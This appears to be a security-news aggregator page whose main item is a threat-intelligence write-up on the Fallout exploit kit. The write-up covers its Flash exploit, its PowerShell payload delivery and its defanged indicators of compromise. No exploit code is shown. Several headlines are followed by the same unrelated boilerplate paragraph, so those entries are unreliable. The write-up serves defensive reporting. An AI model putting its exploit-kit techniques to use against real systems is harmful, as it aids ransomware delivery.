Analyst Workflow: Applying the MITRE ATT&CK Framework to Recorded Future

Key Takeaways

  • Traditionally, researching, analyzing, and reporting on the tactics, techniques, and procedures (TTPs) of a threat actor using the MITRE ATT&CK framework would take weeks of an analyst’s time — but Recorded Future can do it in minutes.
  • Because it is so powerful and flexible, this capability has the potential to help advance the security program of all Recorded Future customers.
  • The MITRE ATT&CK TTP lists within Recorded Future can be applied to any industry, threat actor, or company.
  • The data fidelity of Recorded Future is fully on display when aligned with the MITRE ATT&CK framework. Customers can gain detailed insights into patterns of threat actor activity that dynamically update in real time as new data becomes available.

Today, many security teams consume deep threat actor research through paid or freemium “snapshot in time” reports written by security vendors, researchers, or consultants. In this blog, we’ll explain how applying the MITRE ATT&CK framework to Recorded Future data can give your team the ability to do this deep-level analysis on the fly, for any threat actor, across all sources.

This Week in Security News: Risky Radio Remotes and Cybercrime

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s new research on radio frequency technology and the risks of radio remote controllers. Also, understand why there is a rise in physical crime in the cybercrime underground.

Fallout EK Returns With New Features

Our Counterintelligence Team gathers information and conducts operations to identify threats to an organization so that they can better protect against malicious activity. We accomplish this by combining technology with skilled and experienced intelligence specialists. Our goal is to protect your data, your brand and your people.

Tampa Bay Federal Credit Union Suffers Spoofed Debit Cards

Our Counterintelligence Team gathers information and conducts operations to identify threats to an organization so that they can better protect against malicious activity. We accomplish this by combining technology with skilled and experienced intelligence specialists. Our goal is to protect your data, your brand and your people.

OpIcarus Slowly Limping Along

Our Counterintelligence Team gathers information and conducts operations to identify threats to an organization so that they can better protect against malicious activity. We accomplish this by combining technology with skilled and experienced intelligence specialists. Our goal is to protect your data, your brand and your people.

Do You Know Your Customers?

Every third Thursday of each quarter, ‘Know Your Customer’ Day is held. The day transcends all industries, aimed at businesses and designed to serve as a reminder of how important it is to take the time to understand your customer.

Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices

Digital transformation and the transition to a modern workplace encourage employee engagement, productivity, and collaboration. This transition poses major challenges in protecting sensitive information. In the modern workplace, the perimeter between the corporate network and the cloud are fading. Sensitive data constantly travels between different locations and is often shared with others – both inside and outside the organization. This significantly increases the attack surface and makes identifying, protecting, and monitoring sensitive data challenging.

Improved Fallout EK comes back after short hiatus

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:

  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • Powershell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64 encoded Powershell command calls out the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise

185.56.233[.]186,advancedfeed[.]pro,HookAds Campaign 51.15.35[.]154,payformyattention[.]site,Fallout EK

Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy

Picture this: An object storage misconfiguration has left thousands of customer records fully exposed. Your company is about to face costly compliance consequences and a loss of customer trust. How should you respond? More importantly, how could a secure hybrid cloud strategy have helped prevent such an incident from happening in the first place?

10 Cybersecurity Conference Trips You Should Make Time for This Year

Cybersecurity remains a top priority for chief information security officers (CISOs) worldwide, but it’s easy to get out of touch as the industry evolves at breakneck speed and attackers discover new and innovative ways to compromise corporate networks. That’s why it’s worth investing in cybersecurity conference trips to help IT professionals stay up-to-date by networking with vendors, thought leaders and colleagues.

MEGA Data Breach

newly revealed trove of 772,904,991 unique email addresses and more than 21 million unique passwords that have been aggregated from over 2,000 leaked databases was recently discovered by Troy Hunt, the security researcher who maintains HaveIBeenPwned. The records were stored on one of the most popular cloud storage sites, MEGA, until it got taken down, and then on a public hacking site. The credentials were not even for sale; they were just available for anyone to take. In total, 1,160,253,228 unique combinations of email addresses and passwords were exposed.